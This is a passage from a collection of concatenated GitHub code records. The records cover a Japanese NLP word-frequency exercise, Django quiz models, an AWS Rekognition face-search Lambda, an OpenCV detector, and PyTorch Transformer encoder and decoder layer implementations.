log_channel_id=log[2],\n log_config_int=log[3]\n )\n Logging().info(\"All logs in cache\")\n\n\ndef setup(bot):\n pass\n","repo_name":"Nyria-Development/Bot-Nyria","sub_path":"bot/metrio/logs/listeners/logsMemoryCache.py","file_name":"logsMemoryCache.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"38308309924","text":"# NLP100本ノック\r\n# \r\n# 36. 単語の出現頻度\r\n# 文章中に出現する単語とその出現頻度を求め,出現頻度の高い順に並べよ.\r\n\r\nfrom nlp030 import read_mecab\r\n\r\n\r\nfile_name = \"neko.txt.mecab\"\r\nall_sentences = read_mecab(file_name)\r\n\r\ndef word_freq(all_sentences):\r\n \"\"\"\r\n read_mecab()の出力から、単語の頻度を求める\r\n 辞書に記録してから, 頻度の降順にタプルのリストに変換して返す.\r\n args:\r\n all_sentences: list, read_mecab()で出力される形式のリスト\r\n return:\r\n freq_list_desc: list, タプル(単語, 頻度)のリスト(頻度の降順)\r\n \"\"\"\r\n freq_dic = {}\r\n for sentence in all_sentences:\r\n for morph in sentence:\r\n freq_dic[morph[\"surface\"]] = freq_dic.get(morph[\"surface\"], 0) + 1\r\n freq_list_desc = sorted(freq_dic.items(), key=lambda x :x[1], reverse=True)\r\n # return freq_dic\r\n return freq_list_desc\r\n\r\nif __name__ == '__main__':\r\n file_name = \"neko.txt.mecab\"\r\n all_sentences = read_mecab(file_name)\r\n freq_list_desc = word_freq(all_sentences)\r\n for i in freq_list_desc:\r\n print(\"{}:{}\".format(i[0], i[1]))\r\n","repo_name":"JaChaika/NLP100","sub_path":"04/nlp036.py","file_name":"nlp036.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15826309502","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.utils.timezone import now\n\n#Questions\nclass QuestionData(models.Model):\n\tANSWER_CHOICES=(\n\t\t(\"A\", (\"A\")),\n\t\t(\"B\", (\"B\")),\n\t\t(\"C\", (\"C\")),\n\t\t(\"D\", (\"D\")),\n\t\t)\n\tid_no=models.CharField(max_length=1000,primary_key=True)\n\tquestion=models.TextField()\n\toptionA=models.TextField()\n\toptionB=models.TextField()\n\toptionC=models.TextField()\n\toptionD=models.TextField()\n\tcorrect_choice=models.CharField(choices=ANSWER_CHOICES, max_length=10, null=False)\n\n\n#Time Interval Of Quiz\nclass Time(models.Model):\n\tstart_time = models.DateTimeField(max_length=100, blank=False, default=now)\n\tend_time = models.DateTimeField(max_length=100, blank=False, default=now)\n\n\tdef __str__(self):\n\t\treturn str(self.end_time)\n\n\t\t\n#Scored Card + Solved\nclass SolvedQ(models.Model):\n\tid_no=models.ForeignKey(User, on_delete=models.CASCADE)\n\tq_id=models.ForeignKey(QuestionData, on_delete=models.CASCADE)\n\tcheck=models.BooleanField(default=False)\n\t","repo_name":"abhinavsharma629/Quiz-Portal","sub_path":"quizportal/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31316496961","text":"import os\n\nfrom urllib.parse import unquote_plus\nimport boto3\n\nclient = boto3.client(\"rekognition\")\n\nCOLLECTION_ID = os.environ[\"REKOGNITION_COLLECTION_ID\"]\n\n\ndef handler(event, context):\n bucket = event[\"bucket\"]\n key = unquote_plus(event[\"key\"])\n\n # Detect the faces\n response = client.search_faces_by_image(\n CollectionId=COLLECTION_ID,\n Image={\"S3Object\": {\"Bucket\": bucket, \"Name\": key}},\n MaxFaces=1,\n FaceMatchThreshold=90.0,\n )\n\n if not response[\"FaceMatches\"]:\n return {\"exists\": False}\n else:\n return {\n \"exists\": True,\n \"user_id\": response[\"FaceMatches\"][0][\"Face\"][\"ExternalImageId\"],\n }\n","repo_name":"Zangror/rekognition-demo","sub_path":"lambdas/rekognition/face_search.py","file_name":"face_search.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42813387426","text":"class Vehicle:\n\n def __init__(self, name: str):\n self.name = name\n self.frame = None\n self.engine = None\n self.wheels = None\n self.doors = None\n\n def print(self):\n print(\"__{4}__\\n frame:{0} \\\n \\n engine:{1} \\n wheels:{2} \\n doors:{3} \\n\".format(\n self.frame, self.engine,\n self.wheels, self.doors, self.name))\n\n def get(self):\n return {\n \"name\": self.name,\n \"frame\": self.frame,\n \"engine\": self.engine,\n \"wheels\": self.wheels,\n \"doors\": self.doors\n }\n","repo_name":"mpilkou/design-patterns","sub_path":"1_Builder/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18446525600","text":"import cv2\nfrom sklearn.cluster import KMeans\n\nfrom config import *\nfrom domain.detector.shape.squaredetector import SquareDetector\nfrom domain.detector.worldelement.iworldelementdetector import IWorldElementDetector\nfrom domain.world.drawingarea import DrawingArea\n\n\nclass NoDrawingAreaFoundError(Exception):\n pass\n\n\ndef closest_node(node, nodes):\n nodes = np.asarray(nodes)\n dist_2 = np.sum((nodes - node) ** 2, axis=1)\n return np.argmin(dist_2)\n\n\nclass DrawingAreaDetector(IWorldElementDetector):\n def __init__(self, shape_factory):\n self._shape_factory = shape_factory\n\n def detect(self, image):\n mask = self._threshold_green(image)\n drawing_area = self._find_drawing_area(mask)\n return drawing_area\n\n def _threshold_green(self, image):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(image, LOWER_GREEN_HSV, UPPER_GREEN_HSV)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, ksize=(3, 3))\n mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)\n mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel=kernel, iterations=3)\n return mask\n\n def _find_drawing_area(self, image):\n squares = SquareDetector(self._shape_factory).detect(image)\n if len(squares) > 0:\n inner, outer = self._get_inner_and_outer_edges(squares)\n return DrawingArea(inner, outer)\n else:\n raise NoDrawingAreaFoundError\n\n def _get_inner_and_outer_edges(self, squares):\n sq = np.array([[2, square.area()] for square in squares])\n\n kmeans = KMeans(n_clusters=2, random_state=0).fit(sq)\n\n mean_inner_square = kmeans.cluster_centers_[0]\n mean_outer_square = kmeans.cluster_centers_[1]\n\n inner_index = closest_node(mean_inner_square, sq)\n outer_index = closest_node(mean_outer_square, sq)\n\n return squares[inner_index], squares[outer_index]\n","repo_name":"jenifaelle/design3-vision","sub_path":"src/domain/detector/worldelement/drawingareadetector.py","file_name":"drawingareadetector.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39133435296","text":"import torch\nimport copy\nfrom typing import Optional, Any, Union, Callable, Tuple\nimport torch\nfrom torch import Tensor\nfrom torch.nn import functional as F\nfrom torch.nn import Module\nfrom torch.nn import ModuleList\nfrom torch.nn.init import xavier_uniform_\nfrom torch.nn import Dropout\nfrom torch.nn import Linear\nfrom torch.nn import LayerNorm\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.init import constant_, xavier_normal_, xavier_uniform_\n\n\nclass NonDynamicallyQuantizableLinear(Linear):\n def __init__(self, in_features: int, out_features: int, bias: bool = True) -> None:\n super().__init__(in_features, out_features, bias=bias)\n \n\ndef _get_clones(module, N):\n return ModuleList([copy.deepcopy(module) for i in range(N)])\n\nclass MultiheadAttention(Module):\n r\"\"\"Allows the model to jointly attend to information\n from different representation subspaces.\n See `Attention Is All You Need `_.\n\n .. math::\n \\text{MultiHead}(Q, K, V) = \\text{Concat}(head_1,\\dots,head_h)W^O\n\n where :math:`head_i = \\text{Attention}(QW_i^Q, KW_i^K, VW_i^V)`.\n\n Args:\n embed_dim: Total dimension of the model.\n num_heads: Number of parallel attention heads. Note that ``embed_dim`` will be split\n across ``num_heads`` (i.e. each head will have dimension ``embed_dim // num_heads``).\n dropout: Dropout probability on ``attn_output_weights``. Default: ``0.0`` (no dropout).\n bias: If specified, adds bias to input / output projection layers. Default: ``True``.\n add_bias_kv: If specified, adds bias to the key and value sequences at dim=0. Default: ``False``.\n add_zero_attn: If specified, adds a new batch of zeros to the key and value sequences at dim=1.\n Default: ``False``.\n kdim: Total number of features for keys. Default: ``None`` (uses ``kdim=embed_dim``).\n vdim: Total number of features for values. Default: ``None`` (uses ``vdim=embed_dim``).\n batch_first: If ``True``, then the input and output tensors are provided\n as (batch, seq, feature). Default: ``False`` (seq, batch, feature).\n\n Examples::\n\n >>> multihead_attn = nn.MultiheadAttention(embed_dim, num_heads)\n >>> attn_output, attn_output_weights = multihead_attn(query, key, value)\n \"\"\"\n __constants__ = ['batch_first']\n bias_k: Optional[torch.Tensor]\n bias_v: Optional[torch.Tensor]\n\n def __init__(self, embed_dim, num_heads, dropout=0., bias=True, add_bias_kv=False, add_zero_attn=False,\n kdim=None, vdim=None, batch_first=False, device=None, dtype=None) -> None:\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(MultiheadAttention, self).__init__()\n self.embed_dim = embed_dim\n self.kdim = kdim if kdim is not None else embed_dim\n self.vdim = vdim if vdim is not None else embed_dim\n self._qkv_same_embed_dim = self.kdim == embed_dim and self.vdim == embed_dim\n\n self.num_heads = num_heads\n self.dropout = dropout\n self.batch_first = batch_first\n self.head_dim = embed_dim // num_heads\n assert self.head_dim * num_heads == self.embed_dim, \"embed_dim must be divisible by num_heads\"\n\n if self._qkv_same_embed_dim is False:\n self.q_proj_weight = Parameter(torch.empty((embed_dim, embed_dim), **factory_kwargs))\n self.k_proj_weight = Parameter(torch.empty((embed_dim, self.kdim), **factory_kwargs))\n self.v_proj_weight = Parameter(torch.empty((embed_dim, self.vdim), **factory_kwargs))\n self.register_parameter('in_proj_weight', None)\n else:\n self.in_proj_weight = Parameter(torch.empty((3 * embed_dim, embed_dim), **factory_kwargs))\n self.register_parameter('q_proj_weight', None)\n self.register_parameter('k_proj_weight', None)\n self.register_parameter('v_proj_weight', None)\n\n if bias:\n self.in_proj_bias = Parameter(torch.empty(3 * embed_dim, **factory_kwargs))\n else:\n self.register_parameter('in_proj_bias', None)\n self.out_proj = NonDynamicallyQuantizableLinear(embed_dim, embed_dim, bias=bias)\n\n if add_bias_kv:\n self.bias_k = Parameter(torch.empty((1, 1, embed_dim), **factory_kwargs))\n self.bias_v = Parameter(torch.empty((1, 1, embed_dim), **factory_kwargs))\n else:\n self.bias_k = self.bias_v = None\n\n self.add_zero_attn = add_zero_attn\n\n self._reset_parameters()\n\n def _reset_parameters(self):\n if self._qkv_same_embed_dim:\n xavier_uniform_(self.in_proj_weight)\n else:\n xavier_uniform_(self.q_proj_weight)\n xavier_uniform_(self.k_proj_weight)\n xavier_uniform_(self.v_proj_weight)\n\n if self.in_proj_bias is not None:\n constant_(self.in_proj_bias, 0.)\n constant_(self.out_proj.bias, 0.)\n if self.bias_k is not None:\n xavier_normal_(self.bias_k)\n if self.bias_v is not None:\n xavier_normal_(self.bias_v)\n\n def __setstate__(self, state):\n # Support loading old MultiheadAttention checkpoints generated by v1.1.0\n if '_qkv_same_embed_dim' not in state:\n state['_qkv_same_embed_dim'] = True\n\n super(MultiheadAttention, self).__setstate__(state)\n\n def forward(self, query: Tensor, key: Tensor, value: Tensor, key_padding_mask: Optional[Tensor] = None,\n need_weights: bool = True, attn_mask: Optional[Tensor] = None) -> Tuple[Tensor, Optional[Tensor]]:\n r\"\"\"\n Args:\n query: Query embeddings of shape :math:`(L, N, E_q)` when ``batch_first=False`` or :math:`(N, L, E_q)`\n when ``batch_first=True``, where :math:`L` is the target sequence length, :math:`N` is the batch size,\n and :math:`E_q` is the query embedding dimension ``embed_dim``. Queries are compared against\n key-value pairs to produce the output. See \"Attention Is All You Need\" for more details.\n key: Key embeddings of shape :math:`(S, N, E_k)` when ``batch_first=False`` or :math:`(N, S, E_k)` when\n ``batch_first=True``, where :math:`S` is the source sequence length, :math:`N` is the batch size, and\n :math:`E_k` is the key embedding dimension ``kdim``. See \"Attention Is All You Need\" for more details.\n value: Value embeddings of shape :math:`(S, N, E_v)` when ``batch_first=False`` or :math:`(N, S, E_v)` when\n ``batch_first=True``, where :math:`S` is the source sequence length, :math:`N` is the batch size, and\n :math:`E_v` is the value embedding dimension ``vdim``. See \"Attention Is All You Need\" for more details.\n key_padding_mask: If specified, a mask of shape :math:`(N, S)` indicating which elements within ``key``\n to ignore for the purpose of attention (i.e. treat as \"padding\"). Binary and byte masks are supported.\n For a binary mask, a ``True`` value indicates that the corresponding ``key`` value will be ignored for\n the purpose of attention. For a byte mask, a non-zero value indicates that the corresponding ``key``\n value will be ignored.\n need_weights: If specified, returns ``attn_output_weights`` in addition to ``attn_outputs``.\n Default: ``True``.\n attn_mask: If specified, a 2D or 3D mask preventing attention to certain positions. Must be of shape\n :math:`(L, S)` or :math:`(N\\cdot\\text{num\\_heads}, L, S)`, where :math:`N` is the batch size,\n :math:`L` is the target sequence length, and :math:`S` is the source sequence length. A 2D mask will be\n broadcasted across the batch while a 3D mask allows for a different mask for each entry in the batch.\n Binary, byte, and float masks are supported. For a binary mask, a ``True`` value indicates that the\n corresponding position is not allowed to attend. For a byte mask, a non-zero value indicates that the\n corresponding position is not allowed to attend. For a float mask, the mask values will be added to\n the attention weight.\n\n Outputs:\n - **attn_output** - Attention outputs of shape :math:`(L, N, E)` when ``batch_first=False`` or\n :math:`(N, L, E)` when ``batch_first=True``, where :math:`L` is the target sequence length, :math:`N` is\n the batch size, and :math:`E` is the embedding dimension ``embed_dim``.\n - **attn_output_weights** - Attention output weights of shape :math:`(N, L, S)`, where :math:`N` is the batch\n size, :math:`L` is the target sequence length, and :math:`S` is the source sequence length. Only returned\n when ``need_weights=True``.\n \"\"\"\n if self.batch_first:\n query, key, value = [x.transpose(1, 0) for x in (query, key, value)]\n\n if not self._qkv_same_embed_dim:\n attn_output, attn_output_weights = F.multi_head_attention_forward(\n query, key, value, self.embed_dim, self.num_heads,\n self.in_proj_weight, self.in_proj_bias,\n self.bias_k, self.bias_v, self.add_zero_attn,\n self.dropout, self.out_proj.weight, self.out_proj.bias,\n training=self.training,\n key_padding_mask=key_padding_mask, need_weights=need_weights,\n attn_mask=attn_mask, use_separate_proj_weight=True,\n q_proj_weight=self.q_proj_weight, k_proj_weight=self.k_proj_weight,\n v_proj_weight=self.v_proj_weight)\n else:\n attn_output, attn_output_weights = F.multi_head_attention_forward(\n query, key, value, self.embed_dim, self.num_heads,\n self.in_proj_weight, self.in_proj_bias,\n self.bias_k, self.bias_v, self.add_zero_attn,\n self.dropout, self.out_proj.weight, self.out_proj.bias,\n training=self.training,\n key_padding_mask=key_padding_mask, need_weights=need_weights,\n attn_mask=attn_mask)\n\n if self.batch_first:\n return attn_output.transpose(1, 0), attn_output_weights\n else:\n return attn_output, attn_output_weights\n\nclass TransformerEncoderLayer(Module):\n r\"\"\"TransformerEncoderLayer is made up of self-attn and feedforward network.\n This standard encoder layer is based on the paper \"Attention Is All You Need\".\n Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n Neural Information Processing Systems, pages 6000-6010. Users may modify or implement\n in a different way during application.\n\n Args:\n d_model: the number of expected features in the input (required).\n nhead: the number of heads in the multiheadattention models (required).\n dim_feedforward: the dimension of the feedforward network model (default=2048).\n dropout: the dropout value (default=0.1).\n activation: the activation function of the intermediate layer, can be a string\n (\"relu\" or \"gelu\") or a unary callable. Default: relu\n layer_norm_eps: the eps value in layer normalization components (default=1e-5).\n batch_first: If ``True``, then the input and output tensors are provided\n as (batch, seq, feature). Default: ``False``.\n norm_first: if ``True``, layer norm is done prior to attention and feedforward\n operations, respectivaly. Otherwise it's done after. Default: ``False`` (after).\n\n Examples::\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)\n >>> src = torch.rand(10, 32, 512)\n >>> out = encoder_layer(src)\n\n Alternatively, when ``batch_first`` is ``True``:\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8, batch_first=True)\n >>> src = torch.rand(32, 10, 512)\n >>> out = encoder_layer(src)\n \"\"\"\n __constants__ = ['batch_first', 'norm_first']\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=F.relu,\n layer_norm_eps=1e-5, batch_first=False, norm_first=False,\n device=None, dtype=None) -> None:\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(TransformerEncoderLayer, self).__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n **factory_kwargs)\n # Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm_first = norm_first\n self.norm1 = LayerNorm(d_model, eps=layer_norm_eps)\n self.norm2 = LayerNorm(d_model, eps=layer_norm_eps)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n\n # Legacy string support for activation function.\n if isinstance(activation, str):\n self.activation = _get_activation_fn(activation)\n else:\n self.activation = activation\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu\n super(TransformerEncoderLayer, self).__setstate__(state)\n\n def forward(self, src: Tensor, src_mask: Optional[Tensor] = None, src_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n r\"\"\"Pass the input through the encoder layer.\n\n Args:\n src: the sequence to the encoder layer (required).\n src_mask: the mask for the src sequence (optional).\n src_key_padding_mask: the mask for the src keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n\n # see Fig. 1 of https://arxiv.org/pdf/2002.04745v1.pdf\n\n x = src\n if self.norm_first:\n x = x + self._sa_block(self.norm1(x), src_mask, src_key_padding_mask)\n x = x + self._ff_block(self.norm2(x))\n else:\n x = self.norm1(x + self._sa_block(x, src_mask, src_key_padding_mask))\n x = self.norm2(x + self._ff_block(x))\n\n return x\n\n # self-attention block\n def _sa_block(self, x: Tensor,\n attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n x = self.self_attn(x, x, x,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=False)[0]\n return self.dropout1(x)\n\n # feed forward block\n def _ff_block(self, x: Tensor) -> Tensor:\n x = self.linear2(self.dropout(self.activation(self.linear1(x))))\n return self.dropout2(x)\n\n\nclass TransformerDecoderLayer(Module):\n r\"\"\"TransformerDecoderLayer is made up of self-attn, multi-head-attn and feedforward network.\n This standard decoder layer is based on the paper \"Attention Is All You Need\".\n Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n Neural Information Processing Systems, pages 6000-6010. Users may modify or implement\n in a different way during application.\n\n Args:\n d_model: the number of expected features in the input (required).\n nhead: the number of heads in the multiheadattention models (required).\n dim_feedforward: the dimension of the feedforward network model (default=2048).\n dropout: the dropout value (default=0.1).\n activation: the activation function of the intermediate layer, can be a string\n (\"relu\" or \"gelu\") or a unary callable. Default: relu\n layer_norm_eps: the eps value in layer normalization components (default=1e-5).\n batch_first: If ``True``, then the input and output tensors are provided\n as (batch, seq, feature). Default: ``False``.\n norm_first: if ``True``, layer norm is done prior to self attention, multihead\n attention and feedforward operations, respectivaly. Otherwise it's done after.\n Default: ``False`` (after).\n\n Examples::\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8)\n >>> memory = torch.rand(10, 32, 512)\n >>> tgt = torch.rand(20, 32, 512)\n >>> out = decoder_layer(tgt, memory)\n\n Alternatively, when ``batch_first`` is ``True``:\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8, batch_first=True)\n >>> memory = torch.rand(32, 10, 512)\n >>> tgt = torch.rand(32, 20, 512)\n >>> out = decoder_layer(tgt, memory)\n \"\"\"\n __constants__ = ['batch_first', 'norm_first']\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=F.relu,\n layer_norm_eps=1e-5, batch_first=False, norm_first=False,\n device=None, dtype=None) -> None:\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(TransformerDecoderLayer, self).__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n **factory_kwargs)\n self.multihead_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n **factory_kwargs)\n # Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm_first = norm_first\n self.norm1 = LayerNorm(d_model, eps=layer_norm_eps)\n self.norm2 = LayerNorm(d_model, eps=layer_norm_eps)\n self.norm3 = LayerNorm(d_model, eps=layer_norm_eps)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n self.dropout3 = Dropout(dropout)\n\n # Legacy string support for activation function.\n if isinstance(activation, str):\n self.activation = _get_activation_fn(activation)\n else:\n self.activation = activation\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu\n super(TransformerDecoderLayer, self).__setstate__(state)\n\n def forward(self, tgt: Tensor, memory: Tensor, tgt_mask: Optional[Tensor] = None, memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None, memory_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n r\"\"\"Pass the inputs (and mask) through the decoder layer.\n\n Args:\n tgt: the sequence to the decoder layer (required).\n memory: the sequence from the last layer of the encoder (required).\n tgt_mask: the mask for the tgt sequence (optional).\n memory_mask: the mask for the memory sequence (optional).\n tgt_key_padding_mask: the mask for the tgt keys per batch (optional).\n memory_key_padding_mask: the mask for the memory keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n # see Fig. 1 of https://arxiv.org/pdf/2002.04745v1.pdf\n\n x = tgt\n if self.norm_first:\n x = x + self._sa_block(self.norm1(x), tgt_mask, tgt_key_padding_mask)\n x = x + self._mha_block(self.norm2(x), memory, memory_mask, memory_key_padding_mask)\n x = x + self._ff_block(self.norm3(x))\n else:\n x = self.norm1(x + self._sa_block(x, tgt_mask, tgt_key_padding_mask))\n x = self.norm2(x + self._mha_block(x, memory, memory_mask, memory_key_padding_mask))\n x = self.norm3(x + self._ff_block(x))\n\n return x\n\n # self-attention block\n def _sa_block(self, x: Tensor,\n attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n x = self.self_attn(x, x, x,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=False)[0]\n return self.dropout1(x)\n\n # multihead attention block\n def _mha_block(self, x: Tensor, mem: Tensor,\n attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n x = self.multihead_attn(x, mem, mem,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=False)[0]\n return self.dropout2(x)\n\n # feed forward block\n def _ff_block(self, x: Tensor) -> Tensor:\n x = self.linear2(self.dropout(self.activation(self.linear1(x))))\n return self.dropout3(x)\n\n\n\nclass TransformerDecoderLayerImagen(Module):\n r\"\"\"TransformerDecoderLayer is made up of self-attn, multi-head-attn and feedforward network.\n This standard decoder layer is based on the paper \"Attention Is All You Need\".\n Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n Neural Information Processing Systems, pages 6000-6010. Users may modify or implement\n in a different way during application.\n\n Args:\n d_model: the number of expected features in the input (required).\n nhead: the number of heads in the multiheadattention models (required).\n dim_feedforward: the dimension of the feedforward network model (default=2048).\n dropout: the dropout value (default=0.1).\n activation: the activation function of the intermediate layer, can be a string\n (\"relu\" or \"gelu\") or a unary callable. Default: relu\n layer_norm_eps: the eps value in layer normalization components (default=1e-5).\n batch_first: If ``True``, then the input and output tensors are provided\n as (batch, seq, feature). Default: ``False``.\n norm_first: if ``True``, layer norm is done prior to self attention, multihead\n attention and feedforward operations, respectivaly. Otherwise it's done after.\n Default: ``False`` (after).\n\n Examples::\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8)\n >>> memory = torch.rand(10, 32, 512)\n >>> tgt = torch.rand(20, 32, 512)\n >>> out = decoder_layer(tgt, memory)\n\n Alternatively, when ``batch_first`` is ``True``:\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8, batch_first=True)\n >>> memory = torch.rand(32, 10, 512)\n >>> tgt = torch.rand(32, 20, 512)\n >>> out = decoder_layer(tgt, memory)\n \"\"\"\n __constants__ = ['batch_first', 'norm_first']\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=F.relu,\n layer_norm_eps=1e-5, batch_first=False, norm_first=False,\n device=None, dtype=None) -> None:\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(TransformerDecoderLayerImagen, self).__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n **factory_kwargs)\n self.multihead_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n **factory_kwargs)\n # Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm_first = norm_first\n self.norm1 = LayerNorm(d_model, eps=layer_norm_eps)\n self.norm2 = LayerNorm(d_model, eps=layer_norm_eps)\n self.norm3 = LayerNorm(d_model, eps=layer_norm_eps)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n self.dropout3 = Dropout(dropout)\n\n # Legacy string support for activation function.\n if isinstance(activation, str):\n self.activation = _get_activation_fn(activation)\n else:\n self.activation = activation\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu\n super(TransformerDecoderLayerImagen, self).__setstate__(state)\n\n def forward(self, tgt: Tensor, memory: Tensor, tgt_mask: Optional[Tensor] = None, memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None, memory_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n r\"\"\"Pass the inputs (and mask) through the decoder layer.\n\n Args:\n tgt: the sequence to the decoder layer (required).\n memory: the sequence from the last layer of the encoder (required).\n tgt_mask: the mask for the tgt sequence (optional).\n memory_mask: the mask for the memory sequence (optional).\n tgt_key_padding_mask: the mask for the tgt keys per batch (optional).\n memory_key_padding_mask: the mask for the memory keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n # see Fig. 1 of https://arxiv.org/pdf/2002.04745v1.pdf\n\n x = tgt\n x = self.norm1(x + self._sa_block(x, tgt_mask, tgt_key_padding_mask) + self._mha_block(x, memory, memory_mask, memory_key_padding_mask))\n x = self.norm3(x + self._ff_block(x))\n\n return x\n\n # self-attention block\n def _sa_block(self, x: Tensor,\n attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n x = self.self_attn(x, x, x,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=False)[0]\n return self.dropout1(x)\n\n # multihead attention block\n def _mha_block(self, x: Tensor, mem: Tensor,\n attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n x = self.multihead_attn(x, mem, mem,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=False)[0]\n return self.dropout2(x)\n\n # feed forward block\n def _ff_block(self, x: Tensor) -> Tensor:\n x = self.linear2(self.dropout(self.activation(self.linear1(x))))\n return self.dropout3(x)\n\n\nclass TransformerDecoderLayerCross(Module):\n r\"\"\"TransformerDecoderLayer is made up of self-attn, multi-head-attn and feedforward network.\n This standard decoder layer is based on the paper \"Attention Is All You Need\".\n Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n Neural Information Processing Systems, pages 6000-6010. Users may modify or implement\n in a different way during application.\n\n Args:\n d_model: the number of expected features in the input (required).\n nhead: the number of heads in the multiheadattention models (required).\n dim_feedforward: the dimension of the feedforward network model (default=2048).\n dropout: the dropout value (default=0.1).\n activation: the activation function of the intermediate layer, can be a string\n (\"relu\" or \"gelu\") or a unary callable. Default: relu\n layer_norm_eps: the eps value in layer normalization components (default=1e-5).\n batch_first: If ``True``, then the input and output tensors are provided\n as (batch, seq, feature). Default: ``False``.\n norm_first: if ``True``, layer norm is done prior to self attention, multihead\n attention and feedforward operations, respectivaly. Otherwise it's done after.\n Default: ``False`` (after).\n\n Examples::\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8)\n >>> memory = torch.rand(10, 32, 512)\n >>> tgt = torch.rand(20, 32, 512)\n >>> out = decoder_layer(tgt, memory)\n\n Alternatively, when ``batch_first`` is ``True``:\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8, batch_first=True)\n >>> memory = torch.rand(32, 10, 512)\n >>> tgt = torch.rand(32, 20, 512)\n >>> out = decoder_layer(tgt, memory)\n \"\"\"\n __constants__ = ['batch_first', 'norm_first']\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=F.relu,\n 